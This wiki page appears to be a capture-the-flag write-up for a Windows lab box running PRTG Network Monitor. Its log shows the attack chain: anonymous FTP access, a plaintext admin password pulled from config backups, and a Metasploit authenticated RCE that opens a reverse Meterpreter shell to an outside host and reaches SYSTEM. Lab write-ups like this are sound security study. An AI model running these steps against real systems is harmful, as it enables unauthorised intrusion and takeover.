No edit summary |
No edit summary |
||
| Line 1: | Line 1: | ||
[[Category:Easy]] | [[Category:Easy]] | ||
<syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 18:29 MST | <syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 18:29 MST | ||
Latest revision as of 00:03, 21 January 2023
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 18:29 MST
Nmap scan report for 10.129.96.142
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resyntaxhighlight was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-12-17T01:29:58
|_ start_date: 2022-12-17T01:28:50
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.05 seconds
Logged onto anonymous FTP. Check
❯ ftp anonymous@10.129.96.142
Connected to 10.129.96.142.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
# cd to Users\Public
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
12-16-22 08:29PM 34 user.txt
07-16-16 08:18AM <DIR> Videos
# Grab User Flag
# look around other directories
ftp> pwd
257 "/Users/All Users/Paessler/PRTG Network Monitor" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
12-16-22 09:11PM <DIR> Configuration Auto-Backups
12-16-22 08:39PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
12-16-22 08:39PM <DIR> Logs (Web Server)
12-16-22 08:39PM <DIR> Monitoring Database
12-16-22 11:35PM 1186545 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
12-16-22 11:16PM 1722088 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToD
# grab PRTG config files
grep -C2 pass PRTG\ Configuration.old.bak Winner!
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
Possible PRTG Version?
<link rel="stylesheet" type="text/css" href="[/css/prtgmini.css?prtgversion=18.1.37.13946__](view-syntaxhighlight:http://10.129.96.142/css/prtgmini.css?prtgversion=18.1.37.13946__)" media="print,screen,projection" />
Tried to log into admin page. Failed. Tried to change the year to 2022.... didnt work old box Tried 2021, 2020, nothing. 2019 works!
Ran searchsploit see if there is any goodies,
❯ searchsploit PRTG
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Booted up MSF to give it a shot. Works!
msf6 exploit(windows/http/prtg_authenticated_rce) > run
[*] Started reverse TCP handler on 10.10.16.18:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (175686 bytes) to 10.129.96.142
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.96.142:51587) at 2022-12-16 21:30:51 -0700
meterpreter > shell
Process 2488 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system